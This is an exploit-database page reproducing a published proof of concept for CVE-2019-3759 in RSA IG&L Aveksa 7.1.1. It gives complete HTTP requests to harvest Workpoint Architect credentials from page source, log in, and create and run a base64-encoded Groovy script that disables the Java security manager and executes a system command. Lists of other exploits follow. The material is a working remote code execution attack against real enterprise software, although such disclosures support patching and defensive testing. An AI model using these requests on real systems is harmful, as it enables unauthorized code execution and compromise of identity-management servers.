Search for hundreds of thousands of exploits

"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"

Author

Exploit author

"Jakub Palaczynski"

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-07-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution
# Date: 2019-04-16
# Exploit Author: Jakub Palaczynski, Lukasz Plonka
# Vendor Homepage: https://www.rsa.com/
# Version: 7.1.1, prior to P02 
# CVE : CVE-2019-3759

# (all vulnerable versions can be found at https://www.dell.com/support/security/pl-pl/details/DOC-106943/DSA-2019-134-RSA-Identity-Governance-and-Lifecycle-Product-Security-Update-for-Multiple-Vulnerabi)

Information:
Authenticated users can bypass authorization and get full access to Workpoint Architect module. This module gives possibility to run Groovy scripts which results in Code Execution.

1. First user needs to learn username and password for Architect (different from Aveksa login). Sample request:
https://AVEKSA_HOST/aveksa/main?Oid=193783&ReqType=GetPartial&PageID=ChangeRequestJobPageData&WFObjectID=1%3AWPDS&crID=193783&isAjax=false
search for "<IFRAME" in source of HTML and note username and password

2. Log into Architect. Sample request:
POST /aveksaWFArchitect/auth/login/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 146
Cookie: JSESSIONID=session
Connection: close

{"user":"USERNAME","password":"PASSWORD","dsn":"WPDS","product":{"name":"wp-architect","version":"4.40.16"}}

3. Creating new script that bypasses Java Security Policy and runs "id" system command.
* "statementText" - contains base64-encoded Groovy code
* "name" (at the end) - script name that must be unique
* Save "scriptId" from the response as it is necessary for next request.
POST /aveksaWFArchitect/scripts/?refresh=true&replace=false&checkSyntax=false&saveWithRollbackVersion=false HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 733
Cookie: JSESSIONID=session
Connection: close

{"statements":[{"scriptLineId":"-26:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"sequence":1,"scriptClassId":17,"sourceName":"LOCAL","scriptId":"","name":"","validationStatus":0,"validationStatusMsg":"","statement":{"statementText":"U3lzdGVtLnNldFNlY3VyaXR5TWFuYWdlcihudWxsKTsKJ2lkJy5leGVjdXRlKCkudGV4dA==","statementJava":{"javaClass":"","ejb":false,"ejbVersion":"","jndiName":"","method":"","methodIsStatic":false,"returns":{"location":"system","name":""},"useInstance":false,"useInstanceObjectName":"","action":"insert"}}}],"scriptId":"-27:AUTOGEN","action":"insert","luDate":null,"luId":"","rowVersion":0,"name":"SCRIPTNAME","scriptTypeId":3,"validationStatus":0,"falseMsg":"","description":"","emitEvents":false,"errorText":"","saveMethod":"Architect"}

4. Running created script:
* In the response you have result of your command
PUT /aveksaWFArchitect/scripts/execute/ HTTP/1.1
Host: AVEKSA_HOST
User-Agent: python
wp-product-name: wp-architect
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 58
Cookie: JSESSIONID=session
Connection: close

{"id":"SCRIPTID_OF_CREATED_SCRIPT","newTransaction":false,"symbolTable":{}}
Release DateTitleTypePlatformAuthor
2020-07-26"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)"webappsmultiplebdrake
2020-07-26"Socket.io-file 2.0.31 - Arbitrary File Upload"webappsmultipleCr0wTom
2020-07-26"Bio Star 2.8.2 - Local File Inclusion"webappsmultiple"SITE Team"
2020-07-26"Bludit 3.9.2 - Directory Traversal"webappsmultiple"James Green"
2020-07-26"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution"webappsmultiple"Patrick Hener"
2020-07-22"Sophos VPN Web Panel 2020 - Denial of Service (Poc)"webappsmultiple"Berk KIRAS"
2020-07-22"Docsify.js 4.11.4 - Reflective Cross-Site Scripting"webappsmultiple"Amin Sharifi"
2020-07-14"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2020-07-14"BSA Radar 1.6.7234.24750 - Local File Inclusion"webappsmultiple"William Summerhill"
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
Release DateTitleTypePlatformAuthor
2020-07-06"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"webappsmultiple"Jakub Palaczynski"
2019-10-07"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation"localwindows"Jakub Palaczynski"
2019-10-07"IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload"webappsjava"Jakub Palaczynski"
2019-05-21"Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution"webappsjava"Jakub Palaczynski"
2018-11-05"Royal TS/X - Information Disclosure"webappsjson"Jakub Palaczynski"
2018-10-31"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution"webappsphp"Jakub Palaczynski"
2018-09-17"CA Release Automation NiMi 6.5 - Remote Command Execution"remotejava"Jakub Palaczynski"
2017-12-13"Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read"webappscgi"Jakub Palaczynski"
2017-09-13"Astaro Security Gateway 7 - Remote Code Execution"remotehardware"Jakub Palaczynski"
2016-10-20"Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection"webappsxml"Jakub Palaczynski"
2015-06-10"HP WebInspect 10.4 - XML External Entity Injection"webappsxml"Jakub Palaczynski"
2014-12-12"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution"webappsjsp"Jakub Palaczynski"
2014-12-10"Apache James Server 2.3.2 - Remote Command Execution"remotelinux"Jakub Palaczynski"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48639/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.